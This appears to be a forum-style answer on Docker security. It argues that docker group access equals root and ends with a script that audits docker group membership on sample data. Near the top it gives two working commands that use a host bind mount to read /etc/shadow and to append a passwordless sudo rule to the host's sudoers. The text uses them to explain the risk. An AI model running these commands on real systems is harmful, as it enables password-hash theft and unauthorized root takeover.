Your users need root access to their systems; and if they have some non-root method to access Docker, like the docker
group in Ubuntu, it’s one step away from root.
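```sh
# Read the host's password hashes through a bind mount of the host root
docker run --rm -v /:/host ubuntu:16.04 cat /host/etc/shadow
# Append a passwordless sudo rule for the calling user to the host's sudoers
docker run --rm -v /:/host ubuntu:16.04 sh -c "echo $USER ALL=(ALL) NOPASSWD: ALL >>/host/etc/sudoers"
```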
Also, “debug” mechanisms like `docker exec` jump directly into a root shell in the container and ignore any password setup you might happen to have in the container.

As I said above, nothing stops you from `RUN echo foo | passwd root` in a Dockerfile (visible in `docker history`), or `COPY shadow /etc` (still vulnerable to offline attacks) to “set a root password in the container”, but it’s all but impossible to make that an effective security measure.
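
Since membership of the `docker` group is effectively root on the host, it is worth auditing who holds it. The script below is an added example, not part of the original answer: it lists supplementary members of the group and accounts that have it as their primary group. The function names and the sample accounts are constructed for illustration, and the group is assumed to be named `docker` as on Ubuntu.

```sh
#!/bin/sh
# docker_group_members [GROUP_FILE] [PASSWD_FILE]
# Prints, one per line, every account that belongs to the "docker" group,
# either as a supplementary member or through its primary GID.
docker_group_members() {
    group_file=${1:-/etc/group}
    passwd_file=${2:-/etc/passwd}
    awk -F: '
        # First file, group format: name:passwd:gid:member,member,...
        FNR == NR {
            if ($1 == "docker") {
                gid = $3
                n = split($4, m, ",")
                for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
            }
            next
        }
        # Second file, passwd format: name:passwd:uid:gid:...
        # Catches users whose primary group is docker and who are
        # therefore not listed in the member field above.
        gid != "" && $4 == gid { print $1 }
    ' "$group_file" "$passwd_file" | sort -u
}

# Runs the audit over constructed sample data (not taken from a real host).
sample_audit() {
    tmp=$(mktemp -d) || return 1
    cat >"$tmp/group" <<'EOF'
root:x:0:
sudo:x:27:alice
docker:x:999:alice,ci-runner
EOF
    cat >"$tmp/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
bob:x:1001:1001::/home/bob:/bin/bash
builder:x:1002:999::/home/builder:/bin/sh
EOF
    docker_group_members "$tmp/group" "$tmp/passwd"
    rm -rf "$tmp"
}

sample_audit
```

Called with no arguments, `docker_group_members` reads the live `/etc/group` and `/etc/passwd`; every name it prints should be treated as an account with root on that host.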